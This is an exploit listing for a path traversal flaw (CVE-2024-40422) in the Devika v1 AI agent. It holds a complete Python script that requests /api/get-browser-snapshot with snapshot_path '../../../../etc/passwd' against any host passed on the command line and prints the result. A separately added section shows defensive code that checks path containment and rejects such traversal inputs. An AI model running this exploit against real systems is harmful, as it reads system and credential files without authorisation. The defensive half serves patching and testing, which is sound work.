Devika 1 Path Traversal
Devika version 1 suffers from a path traversal vulnerability.
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }
    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()
    exploit(args.target)
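
For defenders, the containment check that a 'snapshot_path'-style parameter needs before any file is opened, shown next to the unchecked join it replaces. This is an added example, not code from Devika or from the exploit author; the function names, the exception class and the snapshot directory layout are assumptions made for illustration.

```python
import os
import tempfile

class SnapshotPathError(ValueError):
    """Raised when a requested path does not stay inside the snapshot directory."""

def naive_join(base_dir, snapshot_path):
    # Hypothetical unchecked pattern: user input is joined and used as-is.
    return os.path.normpath(os.path.join(base_dir, snapshot_path))

def resolve_snapshot_path(base_dir, snapshot_path):
    """Return an absolute path to a regular file inside base_dir, or raise."""
    if not snapshot_path or "\x00" in snapshot_path:
        raise SnapshotPathError("empty or malformed path")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks; an absolute input
    # replaces base in os.path.join, so it is caught by the check below too.
    candidate = os.path.realpath(os.path.join(base, snapshot_path))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # e.g. different drives on Windows
        inside = False
    if not inside:
        raise SnapshotPathError("path escapes snapshot directory")
    if not os.path.isfile(candidate):
        raise SnapshotPathError("not a regular file")
    return candidate

def demo():
    """Run the check over constructed inputs; returns one outcome per input."""
    outcomes = []
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "snapshots")
        os.mkdir(base)
        with open(os.path.join(base, "shot.png"), "wb") as fh:
            fh.write(b"constructed sample")
        outside = os.path.join(root, "secret.txt")
        with open(outside, "w") as fh:
            fh.write("outside the snapshot directory")
        for name in ("shot.png", "../secret.txt", "../../../../etc/passwd", outside):
            try:
                resolve_snapshot_path(base, name)
                outcomes.append("served")
            except SnapshotPathError:
                outcomes.append("rejected")
    return outcomes

if __name__ == "__main__":
    print(demo())
```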